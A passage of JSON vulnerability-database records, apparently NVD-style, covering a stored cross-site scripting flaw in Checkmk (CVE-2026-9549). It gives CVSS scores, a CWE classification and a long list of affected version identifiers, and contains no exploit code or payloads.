{"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:*:*:*:*:*:*:*"}]}]}], "x_generator": {"engine": "cvelib 1.8.0"}, "x_gcve": [{"recordType": "advisory", "vulnId": "cve-2026-7186"}]}, "adp": [{"metrics": [{"other": {"type": "ssvc", "content": {"timestamp": "2026-06-08T13:15:39.137366Z", "id": "CVE-2026-7186", "options": [{"Exploitation": "none"}, {"Automatable": "no"}, {"Technical Impact": "total"}], "role": "CISA Coordinator", "version": "2.0.3"}}}], "title": "CISA ADP Vulnrichment", "providerMetadata": {"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP", "dateUpdated": "2026-06-08T13:15:47.369Z"}}]}}, {"id": "CVE-2026-9549", "sourceIdentifier": "security@checkmk.com", "published": "2026-06-08T13:16:34.030", "lastModified": "2026-06-08T15:53:09.253", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Stored cross-site scripting in the service discovery active check output in Checkmk <2.5.0p5, <2.4.0p31, <2.3.0p48, and all 2.2.0 versions allows an administrator who can configure active or custom checks to inject malicious HTML or JavaScript into check output that executes in the browser of an admin or a user with host read permissions when they run the check on the service discovery page."}], "metrics": {"cvssMetricV40": [{"source": "security@checkmk.com", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "nvd@nist.gov", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "security@checkmk.com", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:-:*:*:*:*:*:*", "matchCriteriaId": "C66704F1-0B5E-4B43-8748-987022F378F8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b1:*:*:*:*:*:*", "matchCriteriaId": "B068974F-6F67-4CBB-B567-FCED86E28F22"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b2:*:*:*:*:*:*", "matchCriteriaId": "EA70F36A-EEF6-48DC-B15E-055D0DE8A052"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b3:*:*:*:*:*:*", "matchCriteriaId": "B2017F38-38DB-4E96-B34F-160BC731CBBE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b4:*:*:*:*:*:*", "matchCriteriaId": "0949F399-371B-409C-AF9F-32690D881440"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b5:*:*:*:*:*:*", "matchCriteriaId": "42E1E31A-B5CC-45F2-A2E5-3EEF735499BA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b6:*:*:*:*:*:*", "matchCriteriaId": "4B364FCA-500C-458E-B997-82CD0B1D24F9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b7:*:*:*:*:*:*", "matchCriteriaId": "0B32E657-917B-482B-B6A4-3D3746992A4F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b8:*:*:*:*:*:*", "matchCriteriaId": "2119C732-E024-4DA6-8E47-9E08E5E12602"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:i1:*:*:*:*:*:*", "matchCriteriaId": "4F0B99A8-A124-43BD-B8AA-EECC9112346F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p1:*:*:*:*:*:*", "matchCriteriaId": "3FB7221E-BE9F-4529-8E07-8AD547FA3208"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p10:*:*:*:*:*:*", "matchCriteriaId": "30A074AD-9499-46E3-AB67-D6CEE3AA01C3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p11:*:*:*:*:*:*", "matchCriteriaId": "A8BD0240-A22B-4273-BD47-C35A8C12E127"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p12:*:*:*:*:*:*", "matchCriteriaId": "DAA5680F-1DD0-48AA-BB7F-15B27365F0FA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p13:*:*:*:*:*:*", "matchCriteriaId": "BC2F31CA-D4EB-44E6-9A09-5255D33F4A88"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p14:*:*:*:*:*:*", "matchCriteriaId": "CD80BD69-20C6-4E17-B165-98689179A5A1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p15:*:*:*:*:*:*", "matchCriteriaId": "B044D43B-0233-4A0D-A356-B9F9324E2777"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p16:*:*:*:*:*:*", "matchCriteriaId": "7DE79896-EBE5-42F2-A126-2A871BBA1071"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p17:*:*:*:*:*:*", "matchCriteriaId": "51A44E69-EEA1-4B01-B7B3-5BF7B39819E3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p18:*:*:*:*:*:*", "matchCriteriaId": "BCB65AEB-CF52-410B-92B1-2DCFB914FFA4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p19:*:*:*:*:*:*", "matchCriteriaId": "B7E17FA6-9011-489C-9FA9-368CA2D86FAE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p2:*:*:*:*:*:*", "matchCriteriaId": "7BCEB6FF-668F-4313-9264-0BF021AFC45F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p20:*:*:*:*:*:*", "matchCriteriaId": "F8B27218-A4FF-47BE-B578-6DB704478921"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p21:*:*:*:*:*:*", "matchCriteriaId": "8735357F-16A7-4408-9DDD-1C6796BADBE9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p22:*:*:*:*:*:*", "matchCriteriaId": "4505098C-0A2B-481E-A3DF-D6DF8EFA4DE7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p23:*:*:*:*:*:*", "matchCriteriaId": "C12AFCCF-014E-4EEB-8F04-F1ACE182BA98"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p24:*:*:*:*:*:*", "matchCriteriaId": "66B85557-D5EC-4AF4-B97A-D2B80A58B3B1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p25:*:*:*:*:*:*", "matchCriteriaId": "233ECD21-FA72-43AF-8E4C-DAC27CC18F3C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p26:*:*:*:*:*:*", "matchCriteriaId": "8B4DB8EE-C10A-4097-8E66-2932BAEB732E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p27:*:*:*:*:*:*", "matchCriteriaId": "8653402A-C5AA-4CB1-8742-A12CCBE59373"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p28:*:*:*:*:*:*", "matchCriteriaId": "77047A82-E6D5-4E84-9BEC-ACD2FDA91FAE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p29:*:*:*:*:*:*", "matchCriteriaId": "2E44AE62-1746-410F-A28E-F8292E1F8D68"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p3:*:*:*:*:*:*", "matchCriteriaId": "E2342E2D-58B0-43E7-8C01-DF4678520F39"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p30:*:*:*:*:*:*", "matchCriteriaId": "B6C1AC39-5AE0-4FC8-93FF-966400B074F0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p31:*:*:*:*:*:*", "matchCriteriaId": "68455233-52CD-44B8-8B02-D94BA84DA6A8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p32:*:*:*:*:*:*", "matchCriteriaId": "1C95A313-7665-4877-B421-0D20E3D3D54D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p33:*:*:*:*:*:*", "matchCriteriaId": "0AEF278D-D782-4A2B-B1B8-19A21D151AA2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p34:*:*:*:*:*:*", "matchCriteriaId": "B027FE8B-1802-4449-A0CB-6D15F9634559"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p35:*:*:*:*:*:*", "matchCriteriaId": "9B2BC55F-17AE-4BC4-824D-06BE9B15516C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p36:*:*:*:*:*:*", "matchCriteriaId": "1393F094-2D75-44CC-8783-4FDC7450D38E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p37:*:*:*:*:*:*", "matchCriteriaId": "C1294EAE-5CB5-422F-B4C6-3A81B06DE49A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p38:*:*:*:*:*:*", "matchCriteriaId": "2A347A18-7C59-40F5-8CBA-9F9A18B1E105"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p39:*:*:*:*:*:*", "matchCriteriaId": "442780BC-F984-47A3-9F5F-9A5049531C34"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p4:*:*:*:*:*:*", "matchCriteriaId": "1871B646-CA69-477F-B113-B901AC7B3934"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p40:*:*:*:*:*:*", "matchCriteriaId": "768541E6-C94D-4B32-9144-18D81A1AE047"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p41:*:*:*:*:*:*", "matchCriteriaId": "00793C7E-5C20-4696-B829-804CFA8690B5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p42:*:*:*:*:*:*", "matchCriteriaId": "C03BBDDF-F96F-4A36-A7F5-7102A31EC606"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p43:*:*:*:*:*:*", "matchCriteriaId": "92088ED6-F6A8-400A-B015-4F4E02D55ABC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p44:*:*:*:*:*:*", "matchCriteriaId": "AE5F4DD6-9473-4581-BD0E-1D916A7FEF85"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p45:*:*:*:*:*:*", "matchCriteriaId": "6541E323-356B-4B9F-B646-950400122EB3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p46:*:*:*:*:*:*", "matchCriteriaId": "8FC315A6-9110-4302-A0B9-D88B4575852E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p47:*:*:*:*:*:*", "matchCriteriaId": "331CD0EE-E519-4C9C-9124-C35EE12B5FF8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p5:*:*:*:*:*:*", "matchCriteriaId": "EEC65A72-CAE1-4E28-83EF-7ECAFE921BB6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p6:*:*:*:*:*:*", "matchCriteriaId": "D8FDECBC-8213-495F-A932-C4310F7C1F87"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p7:*:*:*:*:*:*", "matchCriteriaId": "CB49BC95-6AA8-4F53-A3D6-E199BF756AAF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p8:*:*:*:*:*:*", "matchCriteriaId": "050B6617-8FD4-47A6-BE4A-A52503A65812"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p9:*:*:*:*:*:*", "matchCriteriaId": "4CA0FEC5-7036-47AF-A341-873B6C324B58"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:-:*:*:*:*:*:*", "matchCriteriaId": "83202950-840A-4CB7-AD96-CE62E84FABD8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:b1:*:*:*:*:*:*", "matchCriteriaId": "1A020A77-7D84-4557-9B0B-D74A89BC1538"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:b2:*:*:*:*:*:*", "matchCriteriaId": "D9770554-978B-4552-9E0E-CD6B6675243C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:b3:*:*:*:*:*:*", "matchCriteriaId": "1883D2F4-CB96-4DDE-87E8-D1990A3FA092"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:b4:*:*:*:*:*:*", "matchCriteriaId": "99AD6F39-AF67-4CB9-BED2-00CA75B9F5DB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:b5:*:*:*:*:*:*", "matchCriteriaId": "F08FE580-67D4-419C-AE4A-3B9EBC6A2838"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:b6:*:*:*:*:*:*", "matchCriteriaId": "9DD5C67F-CD3E-400E-802D-8B52408A259F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p1:*:*:*:*:*:*", "matchCriteriaId": "310A2FA2-633A-48FB-A5C2-9A9A922E72E2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p10:*:*:*:*:*:*", "matchCriteriaId": "3C0F1DC8-D9DF-4A7A-80DC-618FAB091375"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p11:*:*:*:*:*:*", "matchCriteriaId": "9B0A1E3E-1B5A-4346-95BC-DE6FF6EE14CA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p12:*:*:*:*:*:*", "matchCriteriaId": "EB52B2A7-BDC1-4A4F-ABAF-69C1BA8E83C2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p13:*:*:*:*:*:*", "matchCriteriaId": "9F89225F-6969-4D89-B889-9CB09972825B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p14:*:*:*:*:*:*", "matchCriteriaId": "2A1B23EA-4571-4E4E-80BC-FD76FFD83FFB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p15:*:*:*:*:*:*", "matchCriteriaId": "625A6998-5DAE-4538-9760-20523CCE501F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p16:*:*:*:*:*:*", "matchCriteriaId": "6EFD4461-2C37-418F-90AD-3A956B2D91C7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p17:*:*:*:*:*:*", "matchCriteriaId": "88523633-844C-41FE-ADF1-74D6AA2BCE6C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p18:*:*:*:*:*:*", "matchCriteriaId": "5DA03E01-06D1-4E18-9C7B-CB6E49E5954B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p19:*:*:*:*:*:*", "matchCriteriaId": "91F171B6-7F9A-4B9B-B53D-277FE74124F9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p2:*:*:*:*:*:*", "matchCriteriaId": "7D1993E3-C4F9-4D78-BD02-A0B22D93BF1F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p20:*:*:*:*:*:*", "matchCriteriaId": "34FF7D09-2129-4266-BF71-5424DC9E18B7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p21:*:*:*:*:*:*", "matchCriteriaId": "246F0BA5-F927-4204-97F3-51870072599F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p22:*:*:*:*:*:*", "matchCriteriaId": "86ED47B6-58FB-4BAC-9C87-F7BC08AB3870"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p23:*:*:*:*:*:*", "matchCriteriaId": "2CFF173A-373B-4948-BD22-86C031B58E6B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p24:*:*:*:*:*:*", "matchCriteriaId": "90648825-55F7-472A-944E-7E5C787FAFB4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p25:*:*:*:*:*:*", "matchCriteriaId": "6EE2BA6D-737A-4EEB-B8A2-91E9C61B70C1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p26:*:*:*:*:*:*", "matchCriteriaId": "94FA8F05-267D-4B24-9AA3-A77FAD259310"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p27:*:*:*:*:*:*", "matchCriteriaId": "085B463B-633A-447A-B61C-99DD78B49A00"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p28:*:*:*:*:*:*", "matchCriteriaId": "F5DB112B-EE65-4BAB-AED8-716E618FD89C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p29:*:*:*:*:*:*", "matchCriteriaId": "CD9EDBC8-A6A7-4348-8446-1D1DDDACDC51"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p3:*:*:*:*:*:*", "matchCriteriaId": "B28A0C9D-072A-413C-8587-CD57CB918190"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p30:*:*:*:*:*:*", "matchCriteriaId": "CB0E10D1-2497-4CAE-ABA5-9F861C6A65DF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p31:*:*:*:*:*:*", "matchCriteriaId": "9E64A46A-A1E2-4272-A7B8-36140AF2B889"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p32:*:*:*:*:*:*", "matchCriteriaId": "28568D2A-CA5B-42C2-8A32-FF783CB7A06F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p33:*:*:*:*:*:*", "matchCriteriaId": "F82F8827-B7B2-4C10-A42A-77781BC7B24B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p34:*:*:*:*:*:*", "matchCriteriaId": "F641BB83-8A0D-42D0-AB3E-7314918FDC9F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p35:*:*:*:*:*:*", "matchCriteriaId": "FCCE61D4-00B1-4D83-8FAE-8F2FA8F48E2F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p36:*:*:*:*:*:*", "matchCriteriaId": "FDB9628A-5A72-4DD5-9D4A-CBE13B0CFDF4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p37:*:*:*:*:*:*", "matchCriteriaId": "E34FEBB1-0935-4363-B4FE-45901BFC9A5D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p38:*:*:*:*:*:*", "matchCriteriaId": "5C43DE3C-0098-4613-B2A4-39607A63CE42"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p39:*:*:*:*:*:*", "matchCriteriaId": "7F5F5665-C2A9-4877-B3F6-59059A1EEFF6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p4:*:*:*:*:*:*", "matchCriteriaId": "DF22D0A7-82B1-4598-B8C5-BDFE523D07F2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p40:*:*:*:*:*:*", "matchCriteriaId": "7352D105-D045-427C-BA79-0B16D41139D9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p41:*:*:*:*:*:*", "matchCriteriaId": "589909F7-D6E5-4B33-9735-2B97E0B37B87"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p42:*:*:*:*:*:*", "matchCriteriaId": "1BB8717F-F458-4E4C-8D8D-C4F68D4D4B05"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p43:*:*:*:*:*:*", "matchCriteriaId": "1F621FFA-A2C8-46AD-8690-A16CF8B3A048"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p44:*:*:*:*:*:*", "matchCriteriaId": "70807D99-2DAC-4363-BAB3-D047C79DBFBA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p45:*:*:*:*:*:*", "matchCriteriaId": "AD50FAD8-9878-4E77-B50D-5359ABFB94DA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p46:*:*:*:*:*:*", "matchCriteriaId": "0B7FE8F8-E746-45E4-9A20-1873FDF231E7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p47:*:*:*:*:*:*", "matchCriteriaId": "46F70C2A-4595-4BB7-9ADF-8C1FC1344825"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p5:*:*:*:*:*:*", "matchCriteriaId": "20035AFB-75B4-4164-9833-A2FCAE24B577"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p6:*:*:*:*:*:*", "matchCriteriaId": "8BCBACEB-7130-455D-B4BE-243053C116DC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p7:*:*:*:*:*:*", "matchCriteriaId": "156384E2-E04B-4153-A91F-3F307C9FEAE8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p8:*:*:*:*:*:*", "matchCriteriaId": "EEC0ED95-F43B-46D7-9AA0-A0FB1C32EF1D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p9:*:*:*:*:*:*", "matchCriteriaId": "91C194C1-5292-4E2A-BB71-9C5CD3CE6194"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "35B80091-48DA-4414-809F-EBE675B533DB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:-:*:*:*:*:*:*", "matchCriteriaId": "022C075A-4B04-4141-A7D7-F93C9A7CE0FD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:b1:*:*:*:*:*:*", "matchCriteriaId": "60C00469-0CD1-4E9C-8370-CE113842056C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:b2:*:*:*:*:*:*", "matchCriteriaId": "179905FC-821F-4214-A872-E4E3702419D1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:b3:*:*:*:*:*:*", "matchCriteriaId": "04956994-D5A8-45EE-9DC2-8A1D3058CE8E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:b4:*:*:*:*:*:*", "matchCriteriaId": "8868449B-7259-4C3B-8344-0EFE0BA3A97E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:b5:*:*:*:*:*:*", "matchCriteriaId": "BBDF3A13-582F-43D2-B42F-0DC42D4FBFBA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:b6:*:*:*:*:*:*", "matchCriteriaId": "DAF500B3-AA6A-4618-BC7E-0F214B795E0F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p1:*:*:*:*:*:*", "matchCriteriaId": "1CFE68AB-1F57-497C-9229-29ED3A73D87F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p10:*:*:*:*:*:*", "matchCriteriaId": "577F9F72-2FDA-4F87-A840-05158F2368B8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p11:*:*:*:*:*:*", "matchCriteriaId": "6F3AD894-660B-41FC-B910-899A764A00B6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p12:*:*:*:*:*:*", "matchCriteriaId": "21853BB4-1BB5-40E3-82E2-253899D898ED"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p13:*:*:*:*:*:*", "matchCriteriaId": "E7963D66-A89A-4167-A2BA-DFF89B439EAE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p14:*:*:*:*:*:*", "matchCriteriaId": "42099281-2026-4507-A20B-C669C206ADB6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p15:*:*:*:*:*:*", "matchCriteriaId": "29A44B1E-83CD-4A3D-AFFD-82AAC7760293"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p16:*:*:*:*:*:*", "matchCriteriaId": "B4B87192-D81E-4269-ABF3-8D700BB531B0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p17:*:*:*:*:*:*", "matchCriteriaId": "3D35CD46-F8CF-49C3-8CD9-53E1ED038023"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p18:*:*:*:*:*:*", "matchCriteriaId": "D5B5649C-C0BA-4905-98DD-CA606DD2B886"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p19:*:*:*:*:*:*", "matchCriteriaId": "29148EA6-675F-4B35-81BF-B8254C1EB675"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p2:*:*:*:*:*:*", "matchCriteriaId": "B11306B4-1092-470C-BA87-DBD02A18A74B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p20:*:*:*:*:*:*", "matchCriteriaId": "9E85F65E-A103-425E-8AD5-7EE9F093B463"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p21:*:*:*:*:*:*", "matchCriteriaId": "65DF329A-4E2D-4138-99C5-6765789051CB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p22:*:*:*:*:*:*", "matchCriteriaId": 